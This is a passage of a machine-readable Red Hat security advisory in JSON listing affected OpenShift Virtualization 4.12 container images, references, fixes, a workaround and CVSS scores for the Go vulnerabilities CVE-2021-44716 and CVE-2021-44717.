"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44716" }, { "category": "external", "summary": "RHBZ#2030801", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030801" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44716", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44716" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", "url": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k" } ], "release_date": "2021-12-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" }, { "category": "workaround", "details": "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: net/http: limit growth of header canonicalization cache" }, { "cve": "CVE-2021-44717", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2021-12-09T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030806" } ], "notes": [ { "category": "description", "text": "There\u0027s a flaw in golang\u0027s syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: syscall: don\u0027t close fd 0 on ForkExec error", "title": "Vulnerability summary" }, { "category": "other", "text": "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw\u0027s impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", 